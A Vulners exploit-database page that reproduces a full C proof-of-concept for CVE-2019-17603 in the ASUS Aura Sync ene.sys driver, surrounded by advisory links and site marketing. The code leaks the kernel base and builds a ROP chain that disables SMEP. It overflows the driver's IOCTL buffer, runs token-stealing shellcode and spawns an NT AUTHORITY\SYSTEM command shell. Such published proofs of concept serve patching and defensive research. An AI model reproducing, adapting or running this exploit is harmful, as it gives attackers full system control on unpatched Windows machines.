Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ASUS Aura Sync 1.07.71 Privilege Escalation Exploit

🗓️ 26 Jun 2020 00:00:00Reported by Connor McGarrType 
zdt
 zdt🔗 0day.today👁 343 Views

ASUS Aura Sync 1.07.71 Privilege Escalation Exploit, Windows 10 RS1 Version 10.0.14393 Build 14393, Vulnerable IOCTL in ene.sys, Kernel Base Leak, ROP Chain Executio

Related
Code
ReporterTitlePublishedViews
Family
0daydb		FHEM 6.0 - Local File Inclusion
28 Jun 202001:05
0daydb
0daydb		Cisco AnyConnect CVE-2020-3153 - Privilege Escalation
27 Jun 202001:09
0daydb
0daydb		ASUS Aura Sync 1.07.71 CVE-2019-17603 - Privilege Escalation
27 Jun 202001:10
0daydb
CNVD		ASUS Aura Sync Buffer Overflow Vulnerability
3 Jun 202000:00
cnvd
CVE		CVE-2019-17603
2 Jun 202014:47
cve
Cvelist		CVE-2019-17603
2 Jun 202014:47
cvelist
EUVD		EUVD-2019-7929
7 Oct 202500:30
euvd
NVD		CVE-2019-17603
2 Jun 202015:15
nvd
OSV		CVE-2019-17603
2 Jun 202015:15
osv
Prion		Memory corruption
2 Jun 202015:15
prion
Rows per page
// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040

unsigned long long kernelBase()
{

  // Defining EnumDeviceDrivers() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;

  // Calling EnumDeviceDrivers()
  printf("[+] Calling EnumDeviceDrivers()...\n");

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // ntoskrnl.exe is the first module dumped in the array
  // Typcasting LPVOID to unsigned long long
  unsigned long long krnlBase = (unsigned long long)lpImageBase[0];

  // Print update for kernel base
  printf("[+] Found kernel leak!\n");
  printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase);

  return krnlBase;
}

void exploitWork(void)
{
  /*
    [BITS 64]
    _start:
      mov rax, [gs:0x188]  ; Current thread (_KTHREAD)
      mov rax, [rax + 0xb8]  ; Current process (_EPROCESS)
      mov rbx, rax    ; Copy current process (_EPROCESS) to rbx
    __loop:
      mov rbx, [rbx + 0x2e8]   ; ActiveProcessLinks
      sub rbx, 0x2e8    ; Go back to current process (_EPROCESS)
      mov rcx, [rbx + 0x2e0]   ; UniqueProcessId (PID)
      cmp rcx, 4     ; Compare PID to SYSTEM PID 
      jnz __loop    ; Loop until SYSTEM PID is found
      mov rcx, [rbx + 0x358]  ; SYSTEM token is @ offset _EPROCESS + 0x358
      and cl, 0xf0    ; Clear out _EX_FAST_REF RefCnt
      mov [rax + 0x358], rcx  ; Copy SYSTEM token to current process
      xor rax, rax    ; STATUS_SUCCESS
      add rsp, 0xa0    ; Restore execution
      ret      ; Done!
  */
  
  char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80"
       "\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0"
       "\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48"
       "\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04"
       "\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80"
       "\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0"
       "\x48\x81\xC4\xA0\x00\x00\x00\xC3";

  // Allocating shellcode in user mode
  LPVOID shellcode = VirtualAlloc(
    NULL,
    sizeof(payload),
    0x3000,
    0x40
    );

  // Error handling
  if (!shellcode)
  {
    printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print statement for exploit
  printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n");

  // Print update for shellcode location
  printf("[+] Shellcode allocated at: 0x%llx\n", shellcode);

  // Moving memory into allocated space in user mode
  RtlMoveMemory(
    shellcode,
    payload,
    sizeof(payload)
    );

  // Running kernelBase() here to get base of kernel for ROP gadgets
  unsigned long long baseAddress = kernelBase();

  // Defining buffer and buffer size to send to the driver
  char buf [88];
  size_t gadgetSize = 0x8;

  // ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
  // Run rp++ on the target before execution to adjust offsets accordingnly
  // rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe

  // Defining ROP gadgets
  unsigned long long ROP1 = baseAddress + 0x4666b;  // pop rcx ; ret: ntoskrnl.exe
  unsigned long long ROP2 = 0x70678;      // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
  unsigned long long ROP3 = baseAddress + 0x1d87d7;  // mov cr4, rcx ; ret: ntoskrnl.exe

  // Using memset to copy memory into array
  memset(buf, 0x41, 88);

  // Print update for ROP chain
  printf("[+] Exedcuting ROP chain to disable SMEP...\n");
  memcpy(&buf[56], &ROP1, gadgetSize);
  memcpy(&buf[56+8], &ROP2, gadgetSize);
  memcpy(&buf[56+16], &ROP3, gadgetSize);
  memcpy(&buf[56+24], &shellcode, 0x8);

  // Obtaining handle to the driver
  printf("[+] Obtaining handle to the driver via CreateFileA()...\n");
  HANDLE drvHandle = CreateFileA(
    "\\\\.\\EneIo",
    0xC0000000,
    0x0,
    NULL,
    0x3,
    0x0,
    NULL
  );

  // Error handling
  if (!drvHandle)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print update for HANDLE
  printf("[+] Handle to the driver: %d\n", drvHandle);

  // Sending buffer to the driver

  // Defining lpBytesReturned parameter
  DWORD lpBytesReturned;
  
  // Invoking IOCTL routine
  BOOL sendIoctl = DeviceIoControl(
    drvHandle,
    IOCTL_CODE,
    buf,
    sizeof(buf),
    NULL,
    0,
    &lpBytesReturned,
    NULL
    );

  // Error handling
  if (!sendIoctl)
  {
    printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  printf("[+] Interacting with the driver...\n");
}

int main(int argc, char *argv[])
{
  exploitWork();

  // Print update for NT AUTHORITY\SYSTEM shell
  printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

  // Spawning an NT AUTHORITY\SYSTEM shell
  system("cmd.exe /c cmd.exe /K cd C:\\");

  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jun 2020 00:00Current
0.9Low risk
Vulners AI Score0.9
CVSS 27.2
CVSS 3.17.8
EPSS0.0022
asus aura syncprivilege escalationexploitwindows 10ioctlene.syskernel baserop chain
343